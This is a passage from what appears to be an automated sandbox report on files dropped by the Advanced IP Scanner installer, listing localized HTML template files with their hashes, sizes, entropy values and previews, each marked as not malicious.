SSDEEP:	12:AMJnuKov2Fke2B2uT2Bxc+2MKb2tq2HcA2RCz282n0Kt1RhRGDbgzY1pvzAkReEs:lFouAsuSMBXqHH+lL0Kt5RGDjReEhyv
MD5:	1D24AAD630182B5018D26EE86FF9E1E5
SHA1:	D0FFCE32DEB2A2B5BD98274D2D74B135855243F1
SHA-256:	ED422482346F25140F3A4BC2B76225E64C0FB697FC4D9A0691F2B546E041D374
SHA-512:	D943A02304C8EBA2306830FCCDAEB033E7C8D9AB5F385DC57ED5AB3B08B20B8EF343F28D6DC12990B62A718B3B96885A7E9893D29A0ACA6E7FDDDD29AFD8E5F5
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Status:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Operativni sustav:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Proizvo.a.:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Korisnik:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Vrsta:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Datum:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Komentari:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Usluga</center></b></td><td><b><center>Pojedinost

C:\Program Files (x86)\Advanced IP Scanner\details_panel_hu_hu.tpl (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	1177
Entropy (8bit):	4.903797892947706
Encrypted:	false
SSDEEP:	24:lFoybd/suSYXqZqH0vi4cS0Kt5RGDAM9ReEhyv:HH9sRYXqYHqSS0U2DAes
MD5:	5F29203D51A1A790B22063DE29E377AC
SHA1:	C0EDB2A7108E532E66D7B730466022403C64F50D
SHA-256:	C698D74D598B66CBDA7E11B80A6179AAD54AC7CCBA7127E517E4B5AC9FF4C6CD
SHA-512:	D451ADA494D387FA540F90C4F767451463ADFA3B81416E99DE14F2FCC39DD586677E359B0151CA8892BB18F847821D7B002F00D85886909A4F01D094195A27FC
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>.llapot:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Oper.ci.s rendszer:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Gy.rt.:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Felhaszn.l.:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>T.pus:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>D.tum:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Megjegyz.sek:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Szolg.ltat.s</center></b></td><td><

C:\Program Files (x86)\Advanced IP Scanner\details_panel_id_id.tpl (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	HTML document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1148
Entropy (8bit):	4.7922327669232505
Encrypted:	false
SSDEEP:	24:lFoufsuSqJXqL0He3yk/0Kt5RGDNsm6ReEhyv:HnfsRqJXqL0He3ym0U2D+mAs
MD5:	88B009CCACF0EB1B4A141470D3F160C4
SHA1:	EE0D1A44562CCDEDBCDE92D232FA541F53826B4B
SHA-256:	D2254ED99166A12CE00F93379142ACFCBF9A49AF3FB8789E8215B0C1CCCB4587
SHA-512:	D07C7B90A12E7E48A90BF450A57E4479AE5BB130EFE9950A316D9A7AB9063D94AF0F35942925ACA41A7C2C149A0F31A075C38DD0B34821F88BD81588660D0BE1
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Status:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Sistem operasi:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Produsen:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Pengguna:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Tipe:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Tanggal:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Komentar:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Layanan</center></b></td><td><b><center>Rincian</center>

C:\Program Files (x86)\Advanced IP Scanner\details_panel_it_it.tpl (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	HTML document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1149
Entropy (8bit):	4.78207214825378
Encrypted:	false
SSDEEP:	24:lFoBbqsuSqrXq9CHRM9830Kt5RGDeqVReEhyv:HSbqsRqrXqgHw830U2D9Xs
MD5:	470C4551612D8025E2C1FF7129C75577
SHA1:	BA632F06A6C8A7A3E7E53FD6359BEDF2136399BB
SHA-256:	8C04F3998E1827EE98EDB0D17A591F507F75478C88B8A98DA5FABD55DDCFA18E
SHA-512:	21D3AD77522C40E2E4B5C75805EA8460EF6C1ABC4DAA7BD95E1AA7B5387DDA83589EF8A1DA6A915B975524C8B2081CEEF274AD87C3EE1E4EFD02C581D1D33A6C
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Stato:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Sistema operativo:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Produttore:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Utente:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Tipo:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Data:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Commenti:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Servizio</center></b></td><td><b><center>Dettagli</center

C:\Program Files (x86)\Advanced IP Scanner\details_panel_ja_jp.tpl (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	1187
Entropy (8bit):	5.11658152620251
Encrypted:	false
SSDEEP:	24:lFoIyGsuSIXqONHCYQhD0Kt5RGD0ReEhyv:HEGsRIXqONHChhD0U2D2s
MD5:	7B64191A23A7F9EF19022435267FED84
SHA1:	3BDE9A320DFC55B0F19625A0CC3DCD3DA41C04C6
SHA-256:	58BA15AE4911E063749B5A4B7A34272E515F0C0A4399910AE0B983C90AF33516
SHA-512:	F26B20D469909DE8979D10E19BEB94AB556D1D2C241BB1FBE99AD421F1E990DC2A4F7F3E3923A493058A396CEB2E8781CA7ED0802A9893E88D4196BB16C3E7C1
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>..:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>............:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>...:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>....:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>...:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>..:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>....:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>....</center>

C:\Program Files (x86)\Advanced IP Scanner\details_panel_ko_kr.tpl (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	1162
Entropy (8bit):	5.054590965912235
Encrypted:	false
SSDEEP:	12:AMJnuKoh2Oe2B2uT2B6b2MKb2tFb2HcS2RF2TQ2n0Kt1RhRGDbYUzYKeIzAkReEs:lFoMOhsuSrXquHuSr0Kt5RGDBPReEhyv
MD5:	AAFE73E9DD742ECBA22903D3DA498688
SHA1:	AE8580EFD2267042ABB5D6EBC36A0277345BE963
SHA-256:	777877C97D0D8753B28A02666B19729B8E2046A387895CD675EF2E5EEBAE1C7A
SHA-512:	06C7B541638FA292E0438EDBD71733F35988C95A99F10B873299D55D92C66347B974969E31EFEC51B6D9F64859434243BF4252642651DC61E18F067C2A2784E4
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>..:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>.. ..:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>....:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>...:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>..:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>..:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>...:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>...</center></b></td><td><b><center>.. .

C:\Program Files (x86)\Advanced IP Scanner\details_panel_lt_lt.tpl (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	1169
Entropy (8bit):	4.842737243338588
Encrypted:	false
SSDEEP:	24:lFollyUhsuShXqLHu8A0Kt5RGD1PyReEhyv:H+lySsRhXqLHu8A0U2D+s
MD5:	59A017F97EA0743C741E972819CFEA19
SHA1:	E6480E68B930A8595EACBAC255B3BFAFCC30D466
SHA-256:	71D87CFE5437A1407EE398C94F33CBFC8B7DB2EBD7C05BD8A9F2D5817A0F5828
SHA-512:	95B1DF32A4CFB88B8B086121DB65822D114420189F64CA429DE8578983DDA2C825EB017D1E30A1286B618B8B61DB16BB10B85609C88B840A3B5FC48558BF21EE
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>B.sena:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Operacin. sistema:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Gamintojas:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Naudotojas:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Type:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Data:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Komentarai:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Paslauga</center></b></td><td><b><center>I.sami

C:\Program Files (x86)\Advanced IP Scanner\details_panel_lv_lv.tpl (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	1179
Entropy (8bit):	4.8880159035742965
Encrypted:	false
SSDEEP:	24:lFoxnsuSzf9Xqkf9HMXQph0Kt5RGDtn9U8ReEhyv:HqnsRJXqklHMAr0U2Dtn9Js
MD5:	1588431C36A3112355553A6967E3405E
SHA1:	0987D0C5E70F9F25B2E83AA314C83EC8B67539E8
SHA-256:	69655CAB681BC5E4B8AB6D3E160CE914193156E9FD09DA36B3116B6BB958457B
SHA-512:	F4A1362AA900BA4B854E8DB2653D21A26D6A21151D2A979076C81B9F1DC9048DA95EE193C9FA4EDB67E8F85D71F23460C2180213D031B548DCFC495F58990351
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Statuss:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Oper.t.jsist.ma:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Ra.ot.js:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Lietot.js:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Tips:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Datums:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Koment.ri:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Pakalpojums</center></b></td><td><b><center>De

C:\Program Files (x86)\Advanced IP Scanner\details_panel_nb_no.tpl (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	HTML document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1149
Entropy (8bit):	4.789609676615686
Encrypted:	false
SSDEEP:	24:lFouisuSqgQXqI/HuW4/0Kt5RGDVGAk9cReEhyv:HnisRqJXqaHuWK0U2DVXk9+s
MD5:	C81043ED485CCE96CDA08A5986F04E31
SHA1:	8FD38C17A704D3FAF29FF319A86F0FD42A3FC9AA
SHA-256:	119B9E8CA8946875860D593402EF4B085FD3284AA530E757B2A3B9A4B1A0C3F4
SHA-512:	56B916FA8AE9450FBD46BDA6322DE4C9BFC1A92D23A6DA751D615E3C5677C9C2A0B3B50A61831BE7B11C57813E5DCD6122A546508A7EBEF27EE6E2EAE544BFAE
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Status:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Operativsystem:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Produsent:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Bruker:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Type:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Dato:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Kommentarer:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Tjeneste</center></b></td><td><b><center>Detaljer</center

C:\Program Files (x86)\Advanced IP Scanner\details_panel_nl_nl.tpl (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	HTML document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1154
Entropy (8bit):	4.79937338549848
Encrypted:	false
SSDEEP:	24:lFou0BQsuSDQXqbd/Hulm0Kt5RGDz9ScReEhyv:HnkQsRkXqbhHulm0U2Dz9S+s
MD5:	A420CCFD66627A25731173A49B1C98E1
SHA1:	CFEDB045EB2F598E86B375A3C9297F4DE8D18F3A
SHA-256:	FDAD9C0C105BE73D7DCA5B7CB0150D6670EE7BA2824D7DE27CB3F7C9B95CD465
SHA-512:	99DEFA039F7F3C9697B1712658FCDBB33F72F93CD020796A001AEC90F3F46B2759D2DD4BF96F424F66047AB28A315C77DD292625A0514205136DE08C37054236
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Status:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Besturingssysteem:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Fabrikant:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Gebruiker:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Type:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Datum:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Opmerkingen:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Service</center></b></td><td><b><center>Details</c

C:\Program Files (x86)\Advanced IP Scanner\details_panel_pl_pl.tpl (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	1155
Entropy (8bit):	4.85707182260681
Encrypted:	false
SSDEEP:	12:AMJnuKome2B2B2uT2B8G2MKb2tcz2HcqQ2Rn2o2n0Kt1RhRGDb7zYLtzAkReEiWC:lFoUssuSqZXq5HJ8n0Kt5RGDUReEhyv
MD5:	1AD783BD4AF434D47BD69AB818A91DFA
SHA1:	8CC2CED11B633A2F11A1E48E7F209A6E9E0A3187
SHA-256:	2A51B6D68D941C570E1F4DE827D60CE7B0063D255A52099B46406D14249EF919
SHA-512:	1AD4BE09630713AB267391C57C0C71AA139B69799F612DC17D8EBD57D91E98E6B037D8102892BB6A53D4CA3AD9EC9C6BDF3F002AEBC69468AFAAEB84211C9E02
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Stan:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>System operacyjny:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Producent:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>U.ytkownik:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Typ:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Data:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Komentarze:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Us.uga</center></b></td><td><b><center>Szczeg..y</

C:\Program Files (x86)\Advanced IP Scanner\details_panel_pt_br.tpl (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	1158
Entropy (8bit):	4.820254321830803
Encrypted:	false
SSDEEP:	24:lFouCsuShXq+HRM98W0Kt5RGDK9HReEhyv:HnCsRhXq+Hw8W0U2DK9ds
MD5:	82043E0E5311A889AD7709A4A735BC76
SHA1:	F7E2ADBB76BF88A2761F489CB42AAFEF15C95E37
SHA-256:	9B401CE58F581FE4FF8ECECADBF4A4A4A83C3A0BFAE18A9D0FA9D0D1E6C1B990
SHA-512:	E14FC86BF8DFD07536A357A760CDD2858B3536DF69D7FDA7BE06429E9969116C864D3B6036E1E05EA637621DA69F9BBD6776276C1D520F7140DB2646BB9896C0
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Status:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Sistema operacional:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Fabricante:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Usu.rio:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Tipo:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Data:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Coment.rios:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Servi.o</center></b></td><td><b><center>Detalhe

C:\Program Files (x86)\Advanced IP Scanner\details_panel_ro_ro.tpl (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	1155
Entropy (8bit):	4.803303336966706
Encrypted:	false
SSDEEP:	24:lFouq/suSqY/Xq96P/HZryq90Kt5RGDQz9wgReEhyv:HXq/sRqqXq+HZOQ0U2DQz9was
MD5:	27C167C1E5624DC7F4D0256ABAA8632F
SHA1:	7D1E07791656B4EE2B26264D28ED3DEC9CD30C9A
SHA-256:	E84981884815C811EB43482F59016F6920EC3D65C22F6A3CE107CD48E8D91863
SHA-512:	C63F4C7F0CBF7F86C58EF8CB9E4AE5DDDEEB207C47CD11D2CAF3BFEACE1F9F8BCB9A4C52087D2D09469BF4F50133309ACDED2C0572351902761F31B9070E8794
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Stare:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Sistem de operare:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Produc.tor:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Utilizator:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Tip:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Dat.:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Comentarii:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Serviciu</center></b></td><td><b><center>Detalii</

C:\Program Files (x86)\Advanced IP Scanner\details_panel_ru_ru.tpl (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	1244
Entropy (8bit):	5.137449444677303
Encrypted:	false
SSDEEP:	24:lFo/JhkCsuSH9ioXqIVoH39/m0Kt5RGDISReEhyv:HYZsRH9ZXqImHN/m0U2DIYs
MD5:	C09C9A49D20E9E03FBA82E0247B38770
SHA1:	B95253268F788CEB0B603E194C4AB1A7451B2C44
SHA-256:	717CDB05CB153C7C3389BA679B737EE4CABB7DF340AE74B6971CB231526EA3AD
SHA-512:	BAE15F62E99B43C1D7EF0AC4F5BEAFEA1629428668DE1237CDE1903E03B462EB687DE089DFB87B77CA97E8D02D72650EB274595F07DE6DD86FD459C634B97594
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>......:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>............ .......:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>.............:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>............:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>...:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>....:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>...........:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebe

C:\Program Files (x86)\Advanced IP Scanner\details_panel_sk_sk.tpl (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	1159
Entropy (8bit):	4.88658440484172
Encrypted:	false
SSDEEP:	24:lFosMmsuSNXq2HJi4c3Q0Kt5RGDxReEhyv:Hx1sRNXq2HJS3Q0U2D7s
MD5:	E133CA274E9A1C5B55A9AE459656E935
SHA1:	B115F78BD0BA440A10A2ED5093712D7675F3E45C
SHA-256:	D80655A9F288A1207F193025486A876F3B0BF30584F361FF04E8ECEBCB444DA0
SHA-512:	CD4B9AEECE96654B462CF2887C3A6809FA083772016D078172D19C64332D072FE3A1E1F46EF7B1017F3FDAF9F7B0BDC131682BCA50645909FA5BDB807D66B2FB
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Stav:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Opera.n. syst.m:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>V.robca:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Pou..vate.:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Typ:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>D.tum:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Koment.re:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Slu.ba</center></b></td><td><b><center>Podrobnos

C:\Program Files (x86)\Advanced IP Scanner\details_panel_sl_si.tpl (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	HTML document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1163
Entropy (8bit):	4.820312505780483
Encrypted:	false
SSDEEP:	24:lFoJgsuSAXqSH+l70Kt5RGDSRBIReEhyv:HogsRAXqSH+l70U2Di0s
MD5:	D085FB64BFB3757DB202DE6552075927
SHA1:	6D7D1701D2C4A9E4AF18217DD9169E19E1D03F3A
